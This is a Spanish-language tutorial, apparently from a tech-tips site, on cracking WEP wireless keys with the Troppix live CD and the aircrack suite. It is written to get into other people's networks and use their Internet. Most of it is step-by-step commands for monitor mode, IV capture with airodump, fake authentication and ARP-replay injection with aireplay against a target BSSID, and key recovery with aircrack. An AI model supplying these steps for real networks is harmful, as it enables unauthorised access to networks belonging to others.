Manual Básico (in)seguridad wireless . Usando y configurando linux Troppix
- Manual Básico (in)seguridad wireless . Usando y configurando linux Troppix - |
Entrando
en materia para los que no tengan ni idea. Manual Básico Hacking
WEP Troppix Código:
rmmod
ipw2200
echo 100 > /sys/class/firmware/timeout modprobe ipw2200 Grabamos la imagen con un programa que lo permita, como Nero o Alcohol 120% Por último reiniciamos con el CD dentro de la unidad y nos aseguramos de que el boot desde CD-ROM esté activado en la BIOS. Pulsamos ENTER cuando cargue el Troppix, elegimos Spanish y luego nuestro fabricante de tarjeta gráfica y su resolución. 3. Nuestro objetivo, la WEP (Wired Equivalency Privacy) La WEP es la clave que se usa para autentificarse como cliente "legal" ante el Punto de Acceso, y que nos deje formar parte de una red, y por lo tanto conseguir los servicios que se les da a los usuarios de la red(como por ejemplo Internet). Así que, manos a la obra. 4. Averiguar la WEP Para ello hay varios procedimientos, aunque todos se realizan con la suite aircrack ya incluida (recomiendo bajarla en español e instalarla Aircrack en español by Uxío). Yo recomiendo usar el CCW6 de Hwagm y Uxío , para ahorrarnos escribir demasiado, aunque en el Troppix no se puede usar, así que voy a poner el código escrito normal. Bien, entonces lo primero que hacemos es inicializar nuestra tarjeta. Para saber que nombre tiene pinchamos en el símbolo de monitor que hay en la barra y escribimos Código:
iwconfig
Quizá nos aparecerán varias. Nuestra tarjeta es la única que al lado no pone "No wireless extensions" Quedad con ese nombre. La mía es "ath0", y cuando escriba la voy a poner así, cada uno que la cambie por la suya. Inicializamos la tarjeta Código:
airmon.sh start ath0
y ahora entramos en el airodump. Código:
airodump ath0 pruebas 0 1
donde ath0 es la tarjeta, pruebas es el archivo donde se guardan las capturas ,0 es el canal( al escribir 0 indicamos que busque en todos) y 1 indica que sólo se guarden los IVs, para ahorrar espacio en disco o en memoria. Miramos cual es el nombre de la red que queremos buscar la WEP y apuntamos el Channel y el ESSID( nombre de la red), en este manual pongamos que es el 6 y el ESSID "Uxio". Entonces pulsamos Control+Z y escribimos Código:
iwconfig ath0 mode monitor channel 6 essid Uxio
Código:
airmon.sh start ath0 6
Código:
airodump ath0 pruebas 6 1
Bien, entonces así ya estaría. esperamos a que el DATA aumente y cuando llegue a más de 250.000 abrimos otra ventana de comandos (hacemos click en el monitor de abajo) y escribimos Código:
aircrack pruebas*.ivs
Con un poco de suerte debería aparecer la clave aunque a veces se pueden llegar a necesitar hasta 4 millones de IVs (DATA) 5. Acelerar el proceso cuando hay alguien conectado. Como supongo que os daríais cuenta, los DATA suben muy lentos. Para que suban más rápido debemos usar aireplay. Miramos los datos que aparecen en la lista de abajo y cubrimos aquí los datos. Miramos que el BSSID coincida con el de nuestra red. Si hay varios, nos vale cualquiera. Para escribir esto abrimos otra ventana. Código:
aireplay -3 ath0 -b BSSID -h STATION
6. Hacer que haya proceso o acelerarlo cuando no hay "Station" (Cliente), es decir, nadie conectado. A veces ni siquiera van a subir los DATA ni vamos a tener nada en la lista de abajo que tenga que ver con nuestra red. Esto se soluciona de la siguiente manera. Primero abrimos otra ventana y luego ponemos: Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55
Si al final de este comando nos pone association successful lo hemos hecho bien, pero esa ventana no la cerramos porque va a seguir enviando datos cada 30 segundos. Si nos da algún problema escribimos: Código:
iwconfig ath0 rate 1M essid ESSID
Los problemas pueden ser debidos a:
y luego lo de antes. Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55
Bien, después de association succesful abrimos una nueva ventana de comandos y escribimos Código:
aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300
Si sale bien veremos que cuando lleve cierto número de READ empezarán a aumentar ARP y SENT. Además en el airodump veremos que los DATA empiezan a subir. Después de todo esto tenemos que ejecutar el aircrack como ya dije antes para averiguar la clave. Como curiosidad (y salvación para algunos), las redes que son del estilo "PACO 27", sin barra (_), en aireplay quedarían así Código:
-e PACO\ 27.
Apéndice
A. Proyecto CCW: Código:
apt-get
update
apt-get install libqt3-mt libqt3-mt-dev Se baja el gambas 2 de la página de Hwagm http://hwagm.elhacker.net/descargas/programar/gambas2-1.9.22.tar.bz2 Se descomprime en una carpeta cualquiera, vamos a esa carpeta en modo consola y: Código:
./configure
make make install Bajamos el CCW7 de http://uxio3.iespana.es/Programas/ccw7.tar.gz , lo descomprimimos en una carpeta y hacemos: Código:
./ccw6
Si tenéis algún problema con el CCW posteadlo aquí, para no desviar el tema de este hilo: http://foro.elhacker.net/index.php/topic,102226.0.html Os pongo unas imágenes para que os animeis a usarlo. Apéndice B: Configurando la conexión a Internet con Troppix. Podemos hacerlo de dos maneras, a mano o gráficamente en Troppix 1.2 (Menú de inicio -> system -> Network config Es importante que la clave WEP que nos pide la introduzcamos en hexadecimal y separada por dos puntos (tal como la da el airodump). Ejemplo: Código:
A5:B7:B0:02...
La mabera de hacerlo a mano es la siguiente: Código:
iwconfig essid NOMBREDELARED mode managed key WEP
|
- Truco Grabar DVD a AVI
- Manual Cortar y Unir AVI
- Trucos Grabación de CD's
- Cómo grabar una imagen ISO
- Manual Windows Movie Maker
- FAQ Grabadoras de CD's
- FAQ Grabadoras de DVD's
- Diferencias DVD-R y DVD+R
- Diferencias Blu-Ray y HD-DVD
- Diferencias entre VCDs